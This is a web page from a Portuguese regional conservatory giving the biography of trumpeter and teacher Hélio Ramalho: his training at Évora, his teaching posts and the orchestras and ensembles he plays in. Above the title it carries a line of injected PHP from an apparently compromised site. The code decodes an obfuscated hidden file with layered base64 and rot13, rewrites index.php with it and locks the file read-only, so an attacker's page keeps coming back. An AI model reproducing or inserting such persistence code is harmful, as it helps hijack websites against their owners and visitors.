$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Hélio Ramalho – Trompete – Conservatório Regional do Baixo Alentejo

Hélio Ramalho – Trompete

Iniciou os seus estudos musicais aos 10 anos de idade na Banda da Sociedade Filarmónica Corvalense.

No ano de 1993 ingressou na Escola Profissional de Música de Évora, na classe do professor Fabrizio Nasetti, completando o Curso de Nível 3 no ano de 1999.

No ano 2000 iniciou a Licenciatura em Trompete na Universidade de Évora, onde trabalhou com os professores Pedro Monteiro em trompete e com os professores Hugo Assunção e Laurent Rossi em Música de Câmara.

No ano de 2005 foi convidado a actuar a solo com a Orquestra da Universidade de Évora, onde interpretou o Concerto nº 1 para Trompete e Piano de Shostakovich, sob a direcção do maestro Max Rabinovitch. No mesmo ano fez uma digressão a França com a orquestra da Universidade de Évora onde trabalhou com alguns importantes músicos Franceses, nomeadamente o compositor Jean Jacques Giraud e o solista internacional David Pasquier.

No ano de 2006 terminou a Licenciatura e a Profissionalização em trompete.

Enquanto docente, leccionou a disciplina de trompete na Escola de Artes do Norte Alentejano nos anos de 2007 e 2008.

No ano de 2015 terminou o mestrado em interpretação musical, ramo trompete na Universidade de Évora com elevada classificação.

É membro do Quinteto de Metais Alentejano, da Orquestra de Jazz de Évora, do Quinteto de Metais do Baixo Alentejo e da Orquestra de Câmara do Alentejo.

Paralelamente é docente no Conservatório Regional do Alto Alentejo e no Conservatório Regional do Baixo Alentejo, onde desempenha as funções de docência das disciplinas de trompete e música de câmara.

Como freelancer tem colaborado com alguns artistas nacionais, onde inclusivamente realizou algumas gravações discográficas.

Tem trabalhado com algumas orquestras, nomeadamente com a “Orquestra Clássica da Madeira”, “Orquestra Sinfónica Portuguesa”, “Teatro Nacional S. Carlos”, “Orquestra Juvenil Cidade de Évora”, “Orquestra de Câmara do Alentejo “e “Orquestra Ginásio Ópera”. Foi membro de variados agrupamentos entre eles; Quinteto de Metais do Algarve, CRBABrassTrio, Ensemble Contemporâneus e integrou alguns projectos ligados à música pop. Ao longo destes anos tem participado em master classes e workshops de trompete com vários trompetistas, entre eles John Miller, Hakan Hardenberger, David Burt, Jorge Almeida, Reijer Dorresteijn, Bruno Nouvion, António Quítalo, Jeroen Berwaerts, Nenad Markovic, Fruzsina Hara, Per Ivarsson, José Augusto Carneiro, Sérgio Charrinho, John Wallace, Michael Sachs, Mitchell Fennell (direção de orquestra de sopros) António Menino (direção de orquestra de sopros).

Leave a Reply

Your email address will not be published.